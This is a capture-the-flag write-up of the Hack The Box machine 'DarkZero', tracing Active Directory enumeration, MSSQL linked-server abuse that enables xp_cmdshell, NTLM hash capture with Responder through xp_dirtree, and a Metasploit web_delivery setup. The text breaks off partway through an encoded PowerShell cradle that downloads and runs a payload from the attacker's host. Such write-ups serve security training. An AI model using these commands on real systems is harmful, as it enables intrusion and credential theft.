DarkZero [Hard]
DarkZero HTB Season 9
Machine information
As is common in real life pentests, you will start the DarkZero box with credentials for the following account john.w
/ RFulUtONCOL!
.
Author: 0xEr3bus
Enumeration
Nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
└─$ sudo nmap -Pn -sC -sV 10.129.121.112
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-05 11:23 EDT
Nmap scan report for 10.129.121.112
Host is up (0.25s latency).
Not shown: 986 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-10-05 22:23:48Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
| ms-sql-info:
| 10.129.121.112:1433:
| Version:
| name: Microsoft SQL Server 2022 RTM
| number: 16.00.1000.00
| Product: Microsoft SQL Server 2022
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.129.121.112:1433:
| Target_Name: darkzero
| NetBIOS_Domain_Name: darkzero
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: darkzero.htb
| DNS_Computer_Name: DC01.darkzero.htb
| DNS_Tree_Name: darkzero.htb
|_ Product_Version: 10.0.26100
|_ssl-date: 2025-10-05T22:25:18+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-10-05T22:19:55
|_Not valid after: 2055-10-05T22:19:55
2179/tcp open vmrdp?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.darkzero.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.darkzero.htb
| Not valid before: 2025-07-29T11:40:00
|_Not valid after: 2026-07-29T11:40:00
|_ssl-date: TLS randomness does not represent time
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-10-05T22:24:38
|_ start_date: N/A
|_clock-skew: mean: 6h59m59s, deviation: 0s, median: 6h59m59s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 138.63 seconds
So what we got from this one:
- Domain: darkzero.htb
- DC: DC01.darkzero.htb
- Clock Skew is +7 hours
Let’s add these to /etc/hosts
file:
1
10.129.121.112 darkzero.htb DC01.darkzero.htb
DNS (53)
We notice there is port 53
so we gonna do some enum to see that if it reveals domain structure without authentication.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
└─$ dig @10.129.121.112 darkzero.htb ANY
; <<>> DiG 9.20.11-4+b1-Debian <<>> @10.129.121.112 darkzero.htb ANY
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 42049
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 0, ADDITIONAL: 2
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;darkzero.htb. IN ANY
;; ANSWER SECTION:
darkzero.htb. 600 IN A 172.16.20.1
darkzero.htb. 600 IN A 10.129.121.112
darkzero.htb. 3600 IN NS dc01.darkzero.htb.
darkzero.htb. 3600 IN SOA dc01.darkzero.htb. hostmaster.darkzero.htb. 520 900 600 86400 3600
;; ADDITIONAL SECTION:
dc01.darkzero.htb. 1200 IN A 10.129.121.112
;; Query time: 421 msec
;; SERVER: 10.129.121.112#53(10.129.121.112) (TCP)
;; WHEN: Mon Oct 06 06:20:48 EDT 2025
;; MSG SIZE rcvd: 155
From the DNS Query we got:
172.16.20.1
is the internal ip that we can not reach from the outside10.129.121.112
is the external ip as we can access publicly → This one give us some info that this machine may have more than 1 DC and DC01 is the primary one, so chance there maybe using some techniques to pivot to other Domain Controller.
SMB (139,445)
Next up, we gonna do some enum around smb to see if we can found anything useful.
1
2
3
└─$ sudo nxc smb dc01.darkzero.htb -u 'john.w' -p 'RFulUtONCOL!' -d darkzero.htb
SMB 10.129.121.112 445 DC01 [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC01) (domain:darkzero.htb) (signing:True) (SMBv1:False)
SMB 10.129.121.112 445 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
And forgot to mention that we have been provided creds so quickly checking if it works.
→ So we see it verified so let’s enum some users.
1
2
3
4
5
6
7
8
9
└─$ sudo nxc smb dc01.darkzero.htb -u 'john.w' -p 'RFulUtONCOL!' -d darkzero.htb --users
SMB 10.129.121.112 445 DC01 [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC01) (domain:darkzero.htb) (signing:True) (SMBv1:False)
SMB 10.129.121.112 445 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
SMB 10.129.121.112 445 DC01 -Username- -Last PW Set- -BadPW- -Description-
SMB 10.129.121.112 445 DC01 Administrator 2025-09-10 16:42:44 0 Built-in account for administering the computer/domain
SMB 10.129.121.112 445 DC01 Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.129.121.112 445 DC01 krbtgt 2025-07-29 11:40:16 0 Key Distribution Center Service Account
SMB 10.129.121.112 445 DC01 john.w 2025-07-29 15:33:53 0
SMB 10.129.121.112 445 DC01 [*] Enumerated 4 local users: darkzero
We got Administrator
as our goal for this machine, Guest
, krbtgt
and john.w
.
So definitely nothing much to concern so we keep up for smb shares.
1
2
3
4
5
6
7
8
9
10
11
└─$ sudo nxc smb dc01.darkzero.htb -u 'john.w' -p 'RFulUtONCOL!' -d darkzero.htb --shares
SMB 10.129.121.112 445 DC01 [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC01) (domain:darkzero.htb) (signing:True) (SMBv1:False)
SMB 10.129.121.112 445 DC01 [+] darkzero.htb\john.w:RFulUtONCOL!
SMB 10.129.121.112 445 DC01 [*] Enumerated shares
SMB 10.129.121.112 445 DC01 Share Permissions Remark
SMB 10.129.121.112 445 DC01 ----- ----------- ------
SMB 10.129.121.112 445 DC01 ADMIN$ Remote Admin
SMB 10.129.121.112 445 DC01 C$ Default share
SMB 10.129.121.112 445 DC01 IPC$ READ Remote IPC
SMB 10.129.121.112 445 DC01 NETLOGON READ Logon server share
SMB 10.129.121.112 445 DC01 SYSVOL READ Logon server share
Okay, so we find accessible shares with current creds.
→ We gonna check out NETLOGON
as the login scripts and SYSVOL
as the Group Policies cause these two we can only have permission to access. One with $
is not accessible.
1
2
3
4
5
6
7
└─$ smbclient //10.129.121.112/NETLOGON -U "darkzero.htb/john.w%RFulUtONCOL\!"
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Jul 29 07:39:08 2025
.. D 0 Tue Jul 29 07:45:53 2025
7632895 blocks of size 4096. 1528200 blocks available
So nothing much with NETLOGON
, heading to SYSVOL
.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
└─$ smbclient //10.129.121.112/SYSVOL -U "darkzero.htb/john.w%RFulUtONCOL\!"
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Tue Jul 29 07:39:08 2025
.. D 0 Tue Jul 29 07:39:08 2025
darkzero.htb Dr 0 Tue Jul 29 07:39:08 2025
7632895 blocks of size 4096. 1528197 blocks available
smb: \> cd darkzero.htb
smb: \darkzero.htb\> dir
. D 0 Tue Jul 29 07:45:53 2025
.. D 0 Tue Jul 29 07:39:08 2025
DfsrPrivate DHSr 0 Tue Jul 29 07:45:53 2025
Policies D 0 Tue Jul 29 07:39:19 2025
scripts D 0 Tue Jul 29 07:39:08 2025
7632895 blocks of size 4096. 1528197 blocks available
smb: \darkzero.htb\> cd DfsrPrivate\
cd \darkzero.htb\DfsrPrivate\: NT_STATUS_ACCESS_DENIED
smb: \darkzero.htb\Policies\> dir
. D 0 Tue Jul 29 07:39:19 2025
.. D 0 Tue Jul 29 07:45:53 2025
{31B2F340-016D-11D2-945F-00C04FB984F9} D 0 Tue Jul 29 07:39:19 2025
{6AC1786C-016F-11D2-945F-00C04fB984F9} D 0 Tue Jul 29 07:39:19 2025
7632895 blocks of size 4096. 1528195 blocks available
Reason for checking this is that this one related to Group Policy Preferences (GPP) that it often contain passwords that has weak encrypted so we can easily decrypted with some tools related.
→ But seems like we can not found any .xml
files that contain passwords so we gonna enum next port.
RPC (135, 593)
So firstly just list out the users and groups.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
└─$ rpcclient -U "darkzero.htb/john.w%RFulUtONCOL\!" 10.129.121.112
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[john.w] rid:[0xa2b]
rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[Forest Trust Accounts] rid:[0x210]
group:[External Trust Accounts] rid:[0x211]
group:[DnsUpdateProxy] rid:[0x44e]
These RID values we can use to go details specific on it via querygroupmem
and queryuser
.
1
group:[Forest Trust Accounts] rid:[0x210] ⭐
This one pop up and we know there is some trust relationship here.
→ So we checking for the member of this group.
1
2
rpcclient $> querygroupmem 0x210
rid:[0xa2a] attr:[0x7]
RID 0xa2a
is member of Forest Trust Accounts.
→ To know the user of this RID values belongs to, we check it queryuser
.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
rpcclient $> queryuser 0xa2a
User Name : darkzero-ext$
Full Name :
Home Drive :
Dir Drive :
Profile Path:
Logon Script:
Description :
Workstations:
Comment :
Remote Dial :
Logon Time : Wed, 31 Dec 1969 19:00:00 EST
Logoff Time : Wed, 31 Dec 1969 19:00:00 EST
Kickoff Time : Wed, 13 Sep 30828 22:48:05 EDT
Password last set Time : Mon, 29 Sep 2025 14:25:18 EDT
Password can change Time : Tue, 30 Sep 2025 14:25:18 EDT
Password must change Time: Wed, 13 Sep 30828 22:48:05 EDT
unknown_2[0..31]...
user_rid : 0xa2a
group_rid: 0x210
acb_info : 0x00000044
fields_present: 0x00ffffff
logon_divs: 168
bad_password_count: 0x00000000
logon_count: 0x00000000
padding1[0..7]...
logon_hrs[0..21]...
So darkzero-ext$
is trust account for external domain.
1
2
3
darkzero.htb (main domain)
↕ Trust
darkzero-ext (external domain)
And also there is another tool we can use to automate for us is impacket-lookupsid
as it will brute-force RIDs to find the hidden accounts and discover all RIDs.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
└─$ impacket-lookupsid darkzero.htb/john.w:'RFulUtONCOL!'@10.129.121.112
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Brute forcing SIDs at 10.129.121.112
[*] StringBinding ncacn_np:10.129.121.112[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1152179935-589108180-1989892463
498: darkzero\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: darkzero\Administrator (SidTypeUser)
501: darkzero\Guest (SidTypeUser)
502: darkzero\krbtgt (SidTypeUser)
512: darkzero\Domain Admins (SidTypeGroup)
513: darkzero\Domain Users (SidTypeGroup)
514: darkzero\Domain Guests (SidTypeGroup)
515: darkzero\Domain Computers (SidTypeGroup)
516: darkzero\Domain Controllers (SidTypeGroup)
517: darkzero\Cert Publishers (SidTypeAlias)
518: darkzero\Schema Admins (SidTypeGroup)
519: darkzero\Enterprise Admins (SidTypeGroup)
520: darkzero\Group Policy Creator Owners (SidTypeGroup)
521: darkzero\Read-only Domain Controllers (SidTypeGroup)
522: darkzero\Cloneable Domain Controllers (SidTypeGroup)
525: darkzero\Protected Users (SidTypeGroup)
526: darkzero\Key Admins (SidTypeGroup)
527: darkzero\Enterprise Key Admins (SidTypeGroup)
528: darkzero\Forest Trust Accounts (SidTypeGroup)
529: darkzero\External Trust Accounts (SidTypeGroup)
553: darkzero\RAS and IAS Servers (SidTypeAlias)
571: darkzero\Allowed RODC Password Replication Group (SidTypeAlias)
572: darkzero\Denied RODC Password Replication Group (SidTypeAlias)
1000: darkzero\DC01$ (SidTypeUser)
1101: darkzero\DnsAdmins (SidTypeAlias)
1102: darkzero\DnsUpdateProxy (SidTypeGroup)
2601: darkzero\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
2602: darkzero\darkzero-ext$ (SidTypeUser)
2603: darkzero\john.w (SidTypeUser)
1
2
2602: darkzero-ext$ (SidTypeUser) ⭐⭐⭐
2601: SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias) ⭐
So this could be a key for exploits unconstrained delegation
later on.
And also sql server as confirm that there is service account exists so we can do MSSQL attack vector that from nmap
result we saw port 1433
open.
Kerberos (88)
Up next we doing some verify within this port.
First is check for Kerberos pre-auth (AS-REP Roasting).
1
2
3
4
5
└─$ cat users.txt
Administrator
Guest
john.w
darkzero-ext$
1
2
3
4
5
6
7
└─$ impacket-GetNPUsers darkzero.htb/ -dc-ip 10.129.121.112 -usersfile users.txt -no-pass
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_ETYPE_NOSUPP(KDC has no support for encryption type)
[-] User john.w doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User darkzero-ext$ doesn't have UF_DONT_REQUIRE_PREAUTH set
So all users safe that all require pre-authentication.
→ Let’s check for SPNs service so that we can request TGS tickets got crackable hash.
1
2
3
4
└─$ impacket-GetUserSPNs darkzero.htb/john.w:'RFulUtONCOL!' -dc-ip 10.129.121.112 -request
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
No entries found!
As the result, there is nothing.
→ Moving on to some bloodhound collections so that we can uncover more stuffs.
LDAP/LDAPs (389, 636, 3268, 3269)
1
2
3
4
5
6
└─$ bloodhound-python -c All -u john.w -p 'RFulUtONCOL!' -d darkzero.htb -ns 10.129.121.112 --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: darkzero.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.darkzero.htb
<GOT ERROR>
Not sure like what we got some issues.
→ Find out really cool stuffs that call powerview.py which is the new version of PowerView.ps1
but we have interative session without using ldap instead.
1
2
3
4
5
6
└─$ powerview darkzero.htb/john.w:'RFulUtONCOL!'@10.129.101.38
/home/kali/.local/share/uv/tools/powerview/lib/python3.13/site-packages/impacket/examples/ntlmrelayx/attacks/__init__.py:20: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
Logging directory is set to /home/kali/.powerview/logs/darkzero-john.w-10.129.101.38
╭─LDAPS─[DC01.darkzero.htb]─[darkzero\john.w]-[NS:10.129.101.38]
╰─PV ❯
So we gonna check for Unconstrained delegation as we identified that is machine have trust relationship so we need to check it out and if it vulnerable, we can abuse it to escalate to Domain Admin.
To udnerstand and have a explaination about this one, check out unconstrained-delegation-abuse.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
╭─LDAPS─[DC01.darkzero.htb]─[darkzero\john.w]-[NS:10.129.101.38]
╰─PV ❯ Get-DomainComputer -Unconstrained
objectClass : top
person
organizationalPerson
user
computer
cn : DC01
distinguishedName : CN=DC01,OU=Domain Controllers,DC=darkzero,DC=htb
instanceType : 4
name : DC01
objectGUID : {fcaaece7-ea3a-483f-b52c-4ddae3e3251a}
userAccountControl : SERVER_TRUST_ACCOUNT
TRUSTED_FOR_DELEGATION
badPwdCount : 0
badPasswordTime : 01/01/1601 00:00:00 (424 years, 9 months ago)
lastLogoff : 1601-01-01 00:00:00+00:00
lastLogon : 06/10/2025 13:40:53 (today)
pwdLastSet : 29/07/2025 11:40:16 (2 months, 6 days ago)
primaryGroupID : 516
objectSid : S-1-5-21-1152179935-589108180-1989892463-1000
logonCount : 432
sAMAccountName : DC01$
sAMAccountType : SAM_MACHINE_ACCOUNT
operatingSystem : Windows Server 2025 Datacenter
dNSHostName : DC01.darkzero.htb
servicePrincipalName : Hyper-V Replica Service/DC01
Hyper-V Replica Service/DC01.darkzero.htb
Microsoft Virtual System Migration Service/DC01
Microsoft Virtual System Migration Service/DC01.darkzero.htb
Microsoft Virtual Console Service/DC01
Microsoft Virtual Console Service/DC01.darkzero.htb
Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/DC01.darkzero.htb
ldap/DC01.darkzero.htb/ForestDnsZones.darkzero.htb
ldap/DC01.darkzero.htb/DomainDnsZones.darkzero.htb
DNS/DC01.darkzero.htb
GC/DC01.darkzero.htb/darkzero.htb
RestrictedKrbHost/DC01.darkzero.htb
RestrictedKrbHost/DC01
RPC/e78dbc40-94c4-44f5-8ee6-f8bb6b21f3dd._msdcs.darkzero.htb
HOST/DC01/darkzero
HOST/DC01.darkzero.htb/darkzero
HOST/DC01
HOST/DC01.darkzero.htb
HOST/DC01.darkzero.htb/darkzero.htb
E3514235-4B06-11D1-AB04-00C04FC2DCD2/e78dbc40-94c4-44f5-8ee6-f8bb6b21f3dd/darkzero.htb
ldap/DC01/darkzero
ldap/e78dbc40-94c4-44f5-8ee6-f8bb6b21f3dd._msdcs.darkzero.htb
ldap/DC01.darkzero.htb/darkzero
ldap/DC01
ldap/DC01.darkzero.htb
ldap/DC01.darkzero.htb/darkzero.htb
objectCategory : CN=Computer,CN=Schema,CN=Configuration,DC=darkzero,DC=htb
lastLogonTimestamp : 02/10/2025 18:33:13 (3 days ago)
msDS-SupportedEncryptionTypes : RC4-HMAC
AES128
AES256
vulnerabilities : [VULN-005] Account has unconstrained delegation enabled (HIGH)
As result, it mark HIGH
severity so that both DCs vulnerable to TGT capture.
Therefore, we need to have some footage inside so we can discover more.
→ From the nmap
, we saw port 1433
open so we gonna auth inside this service.
MSSQL (1433)
1
2
3
4
5
6
7
8
9
10
11
12
└─$ impacket-mssqlclient darkzero.htb/john.w:'RFulUtONCOL!'@10.129.121.112 -windows-auth
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01): Line 1: Changed database context to 'master'.
[*] INFO(DC01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (160 3232)
[!] Press help for extra shell commands
SQL (darkzero\john.w guest@master)>
So we are in as guest
role, let’s do some recons or enum to check like:
- Is
xp_cmdshell
is enable so we can use to reverse shell for further discovery or even pivoting as we know there is another DC. - Also check for linked servers.
1
2
3
4
5
SQL (darkzero\john.w guest@master)> enable_xp_cmdshell
ERROR(DC01): Line 105: User does not have permission to perform this action.
ERROR(DC01): Line 1: You do not have permission to run the RECONFIGURE statement.
ERROR(DC01): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
ERROR(DC01): Line 1: You do not have permission to run the RECONFIGURE statement.
So as expected, guest
role does not have permission for this xp_cmdshell
.
1
2
3
4
5
6
7
8
9
10
SQL (darkzero\john.w guest@master)> enum_links
SRV_NAME SRV_PROVIDERNAME SRV_PRODUCT SRV_DATASOURCE SRV_PROVIDERSTRING SRV_LOCATION SRV_CAT
----------------- ---------------- ----------- ----------------- ------------------ ------------ -------
DC01 SQLNCLI SQL Server DC01 NULL NULL NULL
DC02.darkzero.ext SQLNCLI SQL Server DC02.darkzero.ext NULL NULL NULL
Linked Server Local Login Is Self Mapping Remote Login
----------------- --------------- --------------- ------------
DC02.darkzero.ext darkzero\john.w 0 dc01_sql_svc
Found out DC02.darkzero.ext
linked server exists. And dc01_sql_svc
can remote into it so change for privilege escalation opportunity.
→ Now we gonna switch to DC02
so that whenever we doing, we will execute as dc01_sql_svc
.
1
2
SQL (darkzero\john.w guest@master)> use_link "DC02.darkzero.ext"
SQL >"DC02.darkzero.ext" (dc01_sql_svc dbo@master)>
Okay now just enable xp_cmdshell
.
1
2
3
SQL >"DC02.darkzero.ext" (dc01_sql_svc dbo@master)> enable_xp_cmdshell
INFO(DC02): Line 196: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
INFO(DC02): Line 196: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
We are now either execute commands, dump credentials and pivoting.
→ So we gonna try MSSQL UNC Path Injection which is stealing NTLM hash and see if we can crack it out.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
└─$ sudo responder -I tun0
[sudo] password for kali:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.16.30]
Responder IPv6 [dead:beef:4::101c]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
Don't Respond To MDNS TLD ['_DOSVC']
TTL for poisoned response [default]
[+] Current Session Variables:
Responder Machine Name [WIN-C3PVFUSRX2Q]
Responder Domain Name [7C3R.LOCAL]
Responder DCE-RPC Port [49012]
[*] Version: Responder 3.1.7.0
[*] Author: Laurent Gaffie, <lgaffie@secorizon.com>
[*] To sponsor Responder: https://paypal.me/PythonResponder
[+] Listening for events...
Setup our responder
and back to SQL to execute xp_dirtree
to capture hash.
1
SQL (darkzero\john.w guest@master)> EXEC ('EXEC xp_dirtree ''\\10.10.16.30\share'';') AT [DC02.darkzero.ext];
1
2
3
[SMB] NTLMv2-SSP Client : 10.129.121.112
[SMB] NTLMv2-SSP Username : darkzero-ext\svc_sql
[SMB] NTLMv2-SSP Hash : svc_sql::darkzero-ext:2046da3fc272e5f9:8025F98A798D4A2C0169964BBE93FCB8:0101000000000000801C8B948436DC014F2957E159C002A10000000002000800370043003300520001001E00570049004E002D004300330050005600460055005300520058003200510004003400570049004E002D00430033005000560046005500530052005800320051002E0037004300330052002E004C004F00430041004C000300140037004300330052002E004C004F00430041004C000500140037004300330052002E004C004F00430041004C0007000800801C8B948436DC0106000400020000000800300030000000000000000000000000300000304011BF826DEA4D120F93AD555C03A658B8F7EC678F845B5C9D1F741CD31A5B0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310036002E00330030000000000000000000
BOOM! Got our hash for svc_sql
.
→ Let’s crack it out.
1
└─$ hashcat -m 5600 svc_sql.hash /usr/share/wordlists/rockyou.txt --force
Waiting for few minutes got no result so seems like uncrackable.
So we moving on to reverse shell and there is some of these concept powershell-for-pentester-windows-reverse-shell that we could try or simply using revshells which they draft for us and we just use them.
→ Trying some concepts and it still get download but can not get reverse shell when executing so we going with Web_Delivery
in msfconsole
.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
└─$ sudo msfconsole -q
[*] Starting persistent handler(s)...
msf > use exploit/multi/script/web_delivery
[*] Using configured payload python/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set LHOST 10.10.16.30
LHOST => 10.10.16.30
msf exploit(multi/script/web_delivery) > set LPORT 4444
LPORT => 4444
msf exploit(multi/script/web_delivery) > set target 2
target => 2
msf exploit(multi/script/web_delivery) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.16.30:4444
[*] Using URL: http://10.10.16.30:8080/2zhss8
[*] Server started.
[*] Run the following command on the target machine:
msf exploit(multi/script/web_delivery) > powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABtAGIAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AGkAZgAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFAAcgBvAHgAeQBdADoAOgBHAGUAdABEAGUAZgBhAHUAbAB0AFAAcgBvAHgAeQAoACkALgBhAGQAZAByAGUAcwBzACAALQBuAGUAIAAkAG4AdQBsAGwAKQB7ACQAbQBiAC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7ACQAbQBiAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA2AC4AMwAwADoAOAAwADgAMAAvADIAegBoAHMAcwA4AC8AWgBIADAAUAA0AFoAeABFAFgAZgB5AFUAJwApACkAOwBJAEUAWAAgACgAKABuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANgAuA